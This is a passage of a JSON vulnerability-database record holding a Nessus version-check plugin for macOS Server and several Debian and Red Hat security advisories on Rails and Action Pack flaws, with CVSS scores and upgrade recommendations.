"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-6750", "CVE-2016-0751", "CVE-2017-2382"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/o:apple:os_x_server"], "id": "MACOS_SERVER_5_3.NASL", "href": "https://www.tenable.com/plugins/nessus/99128", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99128);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2007-6750\", \"CVE-2016-0751\", \"CVE-2017-2382\");\n script_bugtraq_id(21865, 81800, 97128);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-7\");\n\n script_name(english:\"macOS : macOS Server < 5.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the macOS Server version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a security update for macOS Server.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of macOS Server (formerly known as Mac OS X Server)\ninstalled on the remote host is prior to 5.3. It is, therefore,\naffected by the following vulnerabilities :\n\n - A denial of service vulnerability exists in the Apache\n HTTP server when handling a saturation of partial HTTP\n requests. An unauthenticated, remote attacker can\n exploit this to crash the daemon. (CVE-2007-6750)\n\n - A denial of service vulnerability exists in Action Pack\n in Ruby on Rails due to improper restrictions on the use\n of the MIME type cache when handling specially crafted\n HTTP accept headers. An unauthenticated, remote attacker\n can exploit this to cause the cache to grow\n indefinitely. (CVE-2016-0751)\n\n - An information disclosure vulnerability exists in the\n Wiki Server component due to improper checking of\n unspecified permissions. An unauthenticated, remote can\n exploit this to enumerate users. (CVE-2017-2382)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207604\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00008.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e4736faa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS Server version 5.3 or later. Note that macOS Server\nversion 5.3 is available only for macOS 10.12.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2382\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/01/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:os_x_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_server_services.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Server/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"macOS\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Server/Version\");\n\nfixed_version = \"5.3\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_WARNING,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS Server\", version);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2021-10-23T21:55:51", "description": "Package : ruby-actionpack-3.2\nVersion : 3.2.6-6+deb7u3\nCVE ID : CVE-2015-7576 CVE-2016-0751 CVE-2016-0752 CVE-2016-2097 \n CVE-2016-2098 CVE-2016-6316\n\nMultiple vulnerabilities have been discovered in ruby-actionpack-3.2, a\nweb-flow and rendering framework and part of Rails:\n\nCVE-2015-7576\n\n A flaw was found in the way the Action Controller component compared\n user names and passwords when performing HTTP basic\n authentication. Time taken to compare strings could differ depending\n on input, possibly allowing a remote attacker to determine valid user\n names and passwords using a timing attack.\n\nCVE-2016-0751\n\n A flaw was found in the way the Action Pack component performed MIME\n type lookups. Since queries were cached in a global cache of MIME\n types, an attacker could use this flaw to grow the cache indefinitely,\n potentially resulting in a denial of service.\n\nCVE-2016-0752\n\n A directory traversal flaw was found in the way the Action View\n component searched for templates for rendering. If an application\n passed untrusted input to the 'render' method, a remote,\n unauthenticated attacker could use this flaw to render unexpected\n files and, possibly, execute arbitrary code.\n\nCVE-2016-2097\n\n Crafted requests to Action View might result in rendering files from\n arbitrary locations, including files beyond the application's view\n directory. This vulnerability is the result of an incomplete fix of\n CVE-2016-0752. This bug was found by Jyoti Singh and Tobias Kraze\n from Makandra.\n\nCVE-2016-2098\n\n If a web applications does not properly sanitize user inputs, an\n attacker might control the arguments of the render method in a\n controller or a view, resulting in the possibility of executing\n arbitrary ruby code. This bug was found by Tobias Kraze from\n Makandra and joernchen of Phenoelit.\n\nCVE-2016-6316\n\n Andrew Carpenter of Critical Juncture discovered a cross-site\n scripting vulnerability affecting Action View. Text declared as "HTML\n safe" will not have quotes escaped when used as attribute values in\n tag helpers.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.2.6-6+deb7u3.\n\nWe recommend that you upgrade your ruby-actionpack-3.2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-08-28T18:14:37", "type": "debian", "title": "[SECURITY] [DLA 604-1] ruby-actionpack-3.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098", "CVE-2016-6316"], "modified": "2016-08-28T18:14:37", "id": "DEBIAN:DLA-604-1:2A425", "href": "https://lists.debian.org/debian-lts-announce/2016/08/msg00028.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T22:30:30", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3509-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nMarch 09, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2016-2097 CVE-2016-2098\n\nTwo vulnerabilities have been discovered in Rails, a web application\nframework written in Ruby. Both vulnerabilities affect Action Pack, which\nhandles the web requests for Rails.\n\nCVE-2016-2097\n\n Crafted requests to Action View, one of the components of Action Pack,\n might result in rendering files from arbitrary locations, including\n files beyond the application's view directory. This vulnerability is\n the result of an incomplete fix of CVE-2016-0752.\n This bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\nCVE-2016-2098\n\n If a web applications does not properly sanitize user inputs, an\n attacker might control the arguments of the render method in a\n controller or a view, resulting in the possibility of executing\n arbitrary ruby code.\n This bug was found by Tobias Kraze from Makandra and joernchen of\n Phenoelit.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u2.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-03-09T17:48:46", "type": "debian", "title": "[SECURITY] [DSA 3509-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098"], "modified": "2016-03-09T17:48:46", "id": "DEBIAN:DSA-3509-1:A094D", "href": "https://lists.debian.org/debian-security-announce/2016/msg00082.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-24T12:23:28", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3509-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nMarch 09, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2016-2097 CVE-2016-2098\n\nTwo vulnerabilities have been discovered in Rails, a web application\nframework written in Ruby. Both vulnerabilities affect Action Pack, which\nhandles the web requests for Rails.\n\nCVE-2016-2097\n\n Crafted requests to Action View, one of the components of Action Pack,\n might result in rendering files from arbitrary locations, including\n files beyond the application's view directory. This vulnerability is\n the result of an incomplete fix of CVE-2016-0752.\n This bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\nCVE-2016-2098\n\n If a web applications does not properly sanitize user inputs, an\n attacker might control the arguments of the render method in a\n controller or a view, resulting in the possibility of executing\n arbitrary ruby code.\n This bug was found by Tobias Kraze from Makandra and joernchen of\n Phenoelit.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u2.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-09T17:13:24", "type": "debian", "title": "[SECURITY] [DSA 3509-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098"], "modified": "2016-03-09T17:13:24", "id": "DEBIAN:DSA-3509-1:F9416", "href": "https://lists.debian.org/debian-security-announce/2016/msg00081.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-24T12:23:12", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3509-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nMarch 09, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2016-2097 CVE-2016-2098\n\nTwo vulnerabilities have been discovered in Rails, a web application\nframework written in Ruby. Both vulnerabilities affect Action Pack, which\nhandles the web requests for Rails.\n\nCVE-2016-2097\n\n Crafted requests to Action View, one of the components of Action Pack,\n might result in rendering files from arbitrary locations, including\n files beyond the application's view directory. This vulnerability is\n the result of an incomplete fix of CVE-2016-0752.\n This bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\nCVE-2016-2098\n\n If a web applications does not properly sanitize user inputs, an\n attacker might control the arguments of the render method in a\n controller or a view, resulting in the possibility of executing\n arbitrary ruby code.\n This bug was found by Tobias Kraze from Makandra and joernchen of\n Phenoelit.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u2.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-09T17:36:11", "type": "debian", "title": "[SECURITY] [DSA 3509-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098"], "modified": "2016-03-09T17:36:11", "id": "DEBIAN:DSA-3509-1:F91B9", "href": "https://lists.debian.org/debian-security-announce/2016/msg00083.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-24T12:23:10", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3509-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nMarch 09, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2016-2097 CVE-2016-2098\n\nTwo vulnerabilities have been discovered in Rails, a web application\nframework written in Ruby. Both vulnerabilities affect Action Pack, which\nhandles the web requests for Rails.\n\nCVE-2016-2097\n\n Crafted requests to Action View, one of the components of Action Pack,\n might result in rendering files from arbitrary locations, including\n files beyond the application's view directory. This vulnerability is\n the result of an incomplete fix of CVE-2016-0752.\n This bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\nCVE-2016-2098\n\n If a web applications does not properly sanitize user inputs, an\n attacker might control the arguments of the render method in a\n controller or a view, resulting in the possibility of executing\n arbitrary ruby code.\n This bug was found by Tobias Kraze from Makandra and joernchen of\n Phenoelit.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u2.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-09T17:48:46", "type": "debian", "title": "[SECURITY] [DSA 3509-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098"], "modified": "2016-03-09T17:48:46", "id": "DEBIAN:DSA-3509-1:D7374", "href": "https://lists.debian.org/debian-security-announce/2016/msg00082.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-24T12:30:28", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3464-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 31, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2015-3226 CVE-2015-3227 CVE-2015-7576 CVE-2015-7577 \n CVE-2015-7581 CVE-2016-0751 CVE-2016-0752 CVE-2016-0753\n\nMultiple security issues have been discovered in the Rails on Rails web\napplication development framework, which may result in denial of service,\ncross-site scripting, information disclosure or bypass of input\nvalidation.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.1-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-01-31T18:43:51", "type": "debian", "title": "[SECURITY] [DSA 3464-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3226", "CVE-2015-3227", "CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2016-01-31T18:43:51", "id": "DEBIAN:DSA-3464-1:09CC2", "href": "https://lists.debian.org/debian-security-announce/2016/msg00034.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-21T22:25:16", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3651-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nAugust 25, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2016-6316\nDebian Bug : 834155\n\nAndrew Carpenter of Critical Juncture discovered a cross-site scripting\nvulnerability affecting Action View in rails, a web application\nframework written in Ruby. Text declared as "HTML safe" will not have\nquotes escaped when used as attribute values in tag helpers.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:4.1.8-1+deb8u4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:4.2.7.1-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-08-25T16:20:10", "type": "debian", "title": "[SECURITY] [DSA 3651-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-08-25T16:20:10", "id": "DEBIAN:DSA-3651-1:9DFD3", "href": "https://lists.debian.org/debian-security-announce/2016/msg00229.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-24T12:13:17", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3651-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nAugust 25, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : rails\nCVE ID : CVE-2016-6316\nDebian Bug : 834155\n\nAndrew Carpenter of Critical Juncture discovered a cross-site scripting\nvulnerability affecting Action View in rails, a web application\nframework written in Ruby. Text declared as "HTML safe" will not have\nquotes escaped when used as attribute values in tag helpers.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:4.1.8-1+deb8u4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:4.2.7.1-1.\n\nWe recommend that you upgrade your rails packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-08-25T16:20:10", "type": "debian", "title": "[SECURITY] [DSA 3651-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-08-25T16:20:10", "id": "DEBIAN:DSA-3651-1:ADB0B", "href": "https://lists.debian.org/debian-security-announce/2016/msg00229.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-09T04:57:37", "description": "Package : ruby-activesupport-3.2\nVersion : 3.2.6-6+deb7u2\nCVE ID : CVE-2015-3227\n\nThe support and utility classes used by the Rails 3.2 framework allow\nremote attackers to cause a denial of service (SystemStackError) via a\nlarge XML document depth.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.2.6-6+deb7u2.\n\nAdditionally this upload adds 'active_support/security_utils' that will\nbe used by ruby-actionpack-3.2 to address CVE-2015-7576.\n\nWe recommend that you upgrade your ruby-activesupport-3.2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.7, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-08-27T16:25:23", "type": "debian", "title": "[SECURITY] [DLA 603-1] ruby-activesupport-3.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3227", "CVE-2015-7576"], "modified": "2016-08-27T16:25:23", "id": "DEBIAN:DLA-603-1:FFD85", "href": "https://lists.debian.org/debian-lts-announce/2016/08/msg00027.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2021-10-19T20:38:05", "description": "The ruby193 collection provides Ruby version 1.9.3 and Ruby on Rails\nversion 3.2. Ruby on Rails is a model-view-controller (MVC) framework for\nweb application development.\n\nThe following issues were corrected in rubygem-actionpack:\n\nMultiple directory traversal flaws were found in the way the Action View\ncomponent searched for templates for rendering. If an application passed\nuntrusted input to the 'render' method, a remote, unauthenticated attacker\ncould use these flaws to render unexpected files and, possibly, execute\narbitrary code. (CVE-2016-0752, CVE-2016-2097)\n\nA code injection flaw was found in the way the Action View component\nsearched for templates for rendering. If an application passed untrusted\ninput to the 'render' method, a remote, unauthenticated attacker could use\nthis flaw to execute arbitrary code. (CVE-2016-2098)\n\nA flaw was found in the way the Action Pack component performed MIME type\nlookups. Since queries were cached in a global cache of MIME types, an\nattacker could use this flaw to grow the cache indefinitely, potentially\nresulting in a denial of service. (CVE-2016-0751)\n\nA flaw was found in the way the Action Controller component compared user\nnames and passwords when performing HTTP basic authentication. Time taken\nto compare strings could differ depending on input, possibly allowing 